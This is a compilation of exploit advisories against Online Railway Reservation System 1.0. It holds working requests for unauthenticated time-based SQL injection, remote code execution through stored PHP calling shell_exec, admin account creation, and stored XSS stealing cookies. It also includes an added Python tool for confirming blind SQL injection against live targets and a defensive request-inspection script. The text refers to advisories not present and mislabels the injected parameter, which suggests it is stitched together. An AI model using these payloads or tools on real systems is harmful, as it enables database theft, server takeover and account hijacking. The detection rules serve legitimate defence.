<pre><code># Exploit Title: Online Railway Reservation System 1.0 - 'id' SQL Injection (Unauthenticated)<br /># Date: 07/01/2022<br /># Exploit Author: twseptian<br /># Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br /># Version: v1.0<br /># Tested on: Kali Linux 2021.4,PHP 7.4.26<br /><br />*SQL Injection*<br />SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Railway Reservation System v1.0 is vulnerable to SQL injection via the 'sid' parameter of the public Reservation Form, so no login is required.<br /><br />*Attack Vector*<br />An attacker can compromise the application's database with automated or manual tools such as sqlmap.<br /><br />*Steps to reproduce:*<br />Step-1: Navigate to 'Schedule' and open the 'Book' / 'Reservation Form' page using the following URL: <br />http://localhost/orrs/?page=reserve&sid=1<br /><br />Step-2: Put the SQL injection payload in the 'sid' parameter. The payload shape (closing with ') and reopening with (') shows that the value sits inside a parenthesised string literal in the query, so a plain ' prefix is not enough here.<br />In this case we used the time-based blind payload: /orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm<br /><br />Step-3: The target accepts the payload and the response is delayed by 5 seconds.<br /></code></pre>
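The time-based confirmation used in every Step-3 of the OVAS advisory and of this one (and by the sqlmap SLEEP payloads in the two nu11secur1ty advisories), as an added example in Python that is not code from any of those advisories or from sqlmap. The point a practitioner wants beyond "the response got delayed" is a measurement that does not mistake network jitter for SLEEP(): each URL is requested several times and only the fastest observation counts, and the injected request must be slower by almost the whole sleep. The target URL, parameter names and the session cookie in the __main__ block are assumptions for the demo; simulated_target is a constructed stand-in so the code also runs offline.

```python
"""Confirming a time-based blind SQL injection by measuring round trips."""
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

Sender = Callable[[str], None]  # performs one request for a full URL


def sleep_payload(value: str, seconds: int, prefix: str = "'",
                  suffix: str = "'a'='a") -> str:
    """Wrap the original parameter value in the advisories' SLEEP() shape.

    prefix closes the literal the value sits in ("'" for a quoted string,
    "')" for a quoted string inside parentheses, "" for a bare number) and
    suffix re-balances the quotes so the rest of the application's query
    still parses. With an empty suffix nothing is appended.
    """
    core = f"{value}{prefix} AND (SELECT 1 FROM (SELECT(SLEEP({seconds})))x)"
    return f"{core} AND {suffix}" if suffix else core


def build_url(base: str, params: Dict[str, str]) -> str:
    return base + "?" + urllib.parse.urlencode(params)


def http_get(cookie: str = "") -> Sender:
    """Real transport: a plain GET carrying an optional session cookie."""
    def send(url: str) -> None:
        headers = {"Cookie": cookie} if cookie else {}
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=60) as resp:
            resp.read()
    return send


def simulated_target(injectable: bool, seconds: int) -> Sender:
    """Constructed stand-in for offline runs: a pretend application that
    sleeps only if it is injectable and the query carries SLEEP()."""
    def send(url: str) -> None:
        if injectable and "SLEEP(" in urllib.parse.unquote(url):
            time.sleep(seconds)
    return send


def round_trip(send: Sender, url: str) -> float:
    start = time.perf_counter()
    send(url)
    return time.perf_counter() - start


def confirm_time_based(send: Sender, base: str, params: Dict[str, str],
                       param: str, seconds: int = 5, rounds: int = 3,
                       prefix: str = "'", suffix: str = "'a'='a"
                       ) -> Tuple[bool, float, float]:
    """Return (injectable, fastest_baseline, fastest_injected).

    Each URL is requested `rounds` times and the fastest observation is
    kept, so one slow response caused by network jitter cannot masquerade
    as a SLEEP(). The injected request must be slower by (almost) the whole
    sleep, which a uniformly slow server does not achieve.
    """
    injected = dict(params)
    injected[param] = sleep_payload(params[param], seconds, prefix, suffix)
    fastest_base = min(round_trip(send, build_url(base, params)) for _ in range(rounds))
    fastest_inj = min(round_trip(send, build_url(base, injected)) for _ in range(rounds))
    return fastest_inj - fastest_base >= 0.9 * seconds, fastest_base, fastest_inj


if __name__ == "__main__":
    # Assumed lab target: the OVAS appointment-details page (section 1 of the
    # OVAS advisory); the cookie value is a placeholder for an admin session.
    ok, t_base, t_inj = confirm_time_based(
        http_get(cookie="PHPSESSID=replace-with-admin-session"),
        "http://localhost/ovas/admin/",
        {"page": "appointments/view_details", "id": "1"}, "id")
    print(f"baseline {t_base:.2f}s, injected {t_inj:.2f}s, injectable={ok}")
```

For the railway form call it with prefix="')" and suffix="('a'='a" on the sid parameter; for the numeric id of the OVAS My Account form use prefix="" and suffix="". A second run with a different sleep value (2 s, then 5 s) that scales the delay accordingly is the cheapest extra evidence before handing the point to sqlmap.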
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />=====================================================================================================================================<br />Command Execution<br />=====================================================================================================================================<br />classes/SystemSettings.php?f=update_settings accepts the site settings without authentication, and the stored welcome text is evaluated as PHP when the front page renders it. PHP submitted in content[welcome] is therefore executed on the next request to /orrs/:<br /><br />POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447<br />Content-Length: 164<br /><br />-----------------------------41914587873111789572282654447<br />Content-Disposition: form-data; name="content[welcome]"<br /><br /><?php echo shell_exec('id -a'); ?><br />-----------------------------41914587873111789572282654447--<br /><br />=====================================================================================================================================<br />View Output<br />=====================================================================================================================================<br />GET /orrs/ HTTP/1.1<br />Host: localhost<br />Content-Length: 2<br /><br />=====================================================================================================================================<br />View Only STDOUT<br />=====================================================================================================================================<br />curl -i 
-s -k -X $'GET' \<br /> -H $'Host: localhost' -H $'Content-Length: 2' \<br /> --data-binary $'\x0d\x0a' \<br /> $'http://localhost/orrs/'| sed -n '/\"welcome-content\"/,/<\/div/p' | grep -v '<'<br /></code></pre>
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />=====================================================================================================================================<br />Account Creation<br />=====================================================================================================================================<br />POST /orrs/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036<br />Content-Length: 602<br /><br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="firstname"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="lastname"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="username"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="password"<br /><br />testing<br />-----------------------------344736580936503100812880815036<br />Content-Disposition: form-data; name="type"<br /><br />1<br /></code></pre>
<pre><code>#Exploit Title: Online Railway Reservation System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) (Unauthenticated)<br />#Date: 07/01/2022<br />#Exploit Author: Zachary Asher<br />#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html<br />#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip<br />#Version: 1.0<br />#Tested on: Online Railway Reservation System 1.0<br /><br />1)<br />=====================================================================================================================================<br />To Store XSS (about_us)<br />=====================================================================================================================================<br />POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447<br />Content-Length: 159<br /><br />-----------------------------41914587873111789572282654447<br />Content-Disposition: form-data; name="content[about_us]"<br /><br />&lt;svg/onload=alert(document.cookie)&gt;<br /><br />=====================================================================================================================================<br />To Trigger Stored XSS (about_us)<br />=====================================================================================================================================<br />Browse to http://&lt;ip&gt;/orrs/?page=about<br /><br /><br />2)<br />=====================================================================================================================================<br />To Store XSS (train code)<br />=====================================================================================================================================<br />POST /orrs/classes/Master.php?f=save_train HTTP/1.1<br />Host: localhost<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------271324269624375374252271437649<br />Content-Length: 254<br /><br />-----------------------------271324269624375374252271437649<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------271324269624375374252271437649<br />Content-Disposition: form-data; name="code"<br /><br />&lt;svg/onload=alert(document.cookie)&gt;<br /><br />=====================================================================================================================================<br />To Trigger XSS (train code)<br />=====================================================================================================================================<br />Browse to http://localhost/orrs/?page=schedules<br /></code></pre>
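<p>Defender-side check, added here as an example and not code from the project or the advisory authors: request-inspection rules keyed to what the four advisories above describe (the time-based payload on the reservation page's <code>sid</code> parameter, and the <code>Users.php?f=save</code>, <code>SystemSettings.php?f=update_settings</code> and <code>Master.php?f=save_train</code> actions reachable without a login). The sample requests are constructed from the advisories' own requests; <code>has_session</code> is assumed to be supplied by a session-aware proxy or application log, since a plain access log cannot show it.</p>

```python
"""Request-inspection rules keyed to the four ORRS 1.0 advisories above (added example, not the
project's code). Sample records are constructed; `has_session` is assumed to come from a session-aware log."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> action (`f=` value) that the advisories show being reached without a session.
SENSITIVE_ACTIONS = {
    "/orrs/classes/Users.php": "save",                      # admin account creation
    "/orrs/classes/SystemSettings.php": "update_settings",  # stored PHP / XSS in site content
    "/orrs/classes/Master.php": "save_train",               # stored XSS in train code
}
TIME_BASED_SQLI = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)  # delay primitive, as in the sid payload
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)                     # PHP stored through content[...]
HTML_TAG = re.compile(r"<\s*[a-z][a-z0-9]*[\s/>]", re.I)          # markup in a plain-text field

def inspect_request(method, url, fields=None, has_session=False):
    """Return finding names for one request (empty list = nothing matched)."""
    findings = []
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    # Any query value carrying a delay primitive (the advisory's sid payload uses SLEEP(5)).
    if any(TIME_BASED_SQLI.search(v) for vals in query.values() for v in vals):
        findings.append("sqli_time_based")
    action = SENSITIVE_ACTIONS.get(parts.path)
    if method == "POST" and action and query.get("f") == [action]:
        if not has_session:
            findings.append("unauthenticated_admin_action")
        for name, value in (fields or {}).items():
            if PHP_TAG.search(value):
                findings.append("php_code_in_field:" + name)
            elif HTML_TAG.search(value):
                findings.append("html_in_field:" + name)
    return findings

# Constructed records mirroring the requests shown in the advisories: (method, url, POST fields).
SAMPLE_REQUESTS = [
    ("GET", "/orrs/?page=reserve&sid=1') AND (SELECT 6842 FROM (SELECT(SLEEP(5)))UsWr) AND ('WBCm'='WBCm", None),
    ("POST", "/orrs/classes/SystemSettings.php?f=update_settings", {"content[welcome]": "<?php echo shell_exec('id -a'); ?>"}),
    ("POST", "/orrs/classes/Users.php?f=save", {"firstname": "testing", "username": "testing", "password": "testing", "type": "1"}),
    ("POST", "/orrs/classes/Master.php?f=save_train", {"id": "1", "code": "<svg/onload=alert(document.cookie)>"}),
    ("GET", "/orrs/?page=schedules", None),  # ordinary page view: must stay clean
]

def scan(requests=SAMPLE_REQUESTS):
    """Return {url: findings} for every request that produced at least one finding."""
    results = ((url, inspect_request(method, url, fields)) for method, url, fields in requests)
    return {url: findings for url, findings in results if findings}
```

Feeding `scan()` the sample set flags four of the five records; the `?page=schedules` view stays clean, and the same POSTs arriving with a valid session produce only the field-content findings.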